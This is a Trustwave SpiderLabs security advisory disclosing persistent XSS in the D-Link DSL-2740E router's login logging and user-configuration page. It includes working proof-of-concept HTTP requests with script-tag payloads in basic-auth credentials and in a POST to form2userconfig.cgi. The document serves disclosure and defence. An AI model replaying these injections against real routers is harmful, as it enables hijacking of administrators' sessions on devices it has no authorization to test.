Trustwave SpiderLabs Security Advisory TWSL2016-018:
Multiple Persistent XSS Vulnerabilities in D-Link DSL-2740E ADSL Router

Published: 09/16/2016
Version: 1.0

Vendor: D-link (www.dlink.com)
Product: ADSL Router
Version affected: DSL-2740E

Product description:
ADSL home router

Finding 1: Multiple Persistent XSS
Credit: Jose Tozo of Trustwave 
CWE: CWE-79

D-Link DSL-2740E ADSL Router Multiple Persistent XSS

Example:

D-Link routers are prone to persistent XSS attacks in it username and password 
fields, a remote unauthenticated user may craft logins and passwords with 
script tags in it. Because there is no sanitization in the input fields, an 
unaware logged administrator may be a victim when checking the modem logs.

The modem use basic authentication, so when a user tries to login with:

http://wronguser:wrongpass@192.168.0.1/

it will get the wronguser:wrongpass and base64 encode it to create the basic 
authentication request header as follow:

GET /index.htm
Host 192.168.0.1
Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
[...]
Connection keep-alive
Authorization Basic d3Jvbmd1c2VyOndyb25ncGFzcw==

So if we send user like <script>alert('XSSuser')</script> or pass like 
<script>alert('XSSpass')</script>

We already have injected the persistent code into the log. 

Now if the admin go to check the logs in the tab "Maintenance" --> "System Logs" or

GET http://192.168.0.1/logging.html

And select to show the Error and Warning Logs, we will trigger the Cross-site 
scripting in the authenticated session

[...]
<td>
<b>
username=
<script>alert('XSSuser')</script> 
password=
<script>alert('XSSpass')</script>
</b>
</td>
[...]

Additionally, if we are already authenticated we can create a user called 
"<script>alert('xss')</script>"

If you try using the web form a javascript will prevent you to create a user in 
the user config panel http://192.168.0.1/userconfig.htm

But you can always use tools to bypass this, the request is as follow:

POST /form2userconfig.cgi
Host 192.168.0.1
Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
[...]
Connection keep-alive
Authorization Basic d3Jvbmd1c2VyOndyb25ncGFzcw==

POSTDATA username=<script>alert('XSS')</script>&oldpass=&newpass=123&confpass=123a&idletime=5&adduser=Adicionar&select=s2&hiddenpass=&submit.htm%3Fuserconfig.htm=Send

Now everytime someone checks the http://192.168.0.1/userconfig.htm it will 
trigger the persistent XSS:

[...]
<td class="form_label_col" width="30%"><script>alert('XSS')</script></td>
[...]

The Firmware Version validated was DSL_2740E_1.00_BG_20150720 

Other versions from the series DSL-2740B/E/U/R may be vulnerable.

Vendor Response:
D-Link is still developing a fix estimated to be available at the end of Sep. 
2016.  Contact security@dlink.com for questions or an announcement will be made 
on support.dlink.com home page up new updates/security fixes.

Remediation Steps:
No official patch is available.  To limit exposure,
network access to these devices should be limited to authorized 
personnel through the use of Access Control Lists and proper
network segmentation.

Revision History:
05/26/2016 - Vulnerability disclosed to vendor
07/01/2016 - Vendor releases firmware version 4926e811
07/15/2016 - Vendor received feedback that tests performed indicate firmware patch is not fixed.
08/24/2016 - Exceeded 90 days after date of contact to release a patch
09/16/2016 - Advisory published

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security 
risk. With cloud and managed security services, integrated technologies and a 
team of security experts, ethical hackers and researchers, Trustwave enables 
businesses to transform the way they manage their information security and 
compliance programs. More than three million businesses are enrolled in the 
Trustwave TrustKeeper cloud platform, through which Trustwave delivers 
automated, efficient and cost-effective threat, vulnerability and compliance 
management. Trustwave is headquartered in Chicago, with customers in 96 
countries. For more information about Trustwave, visit 
https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.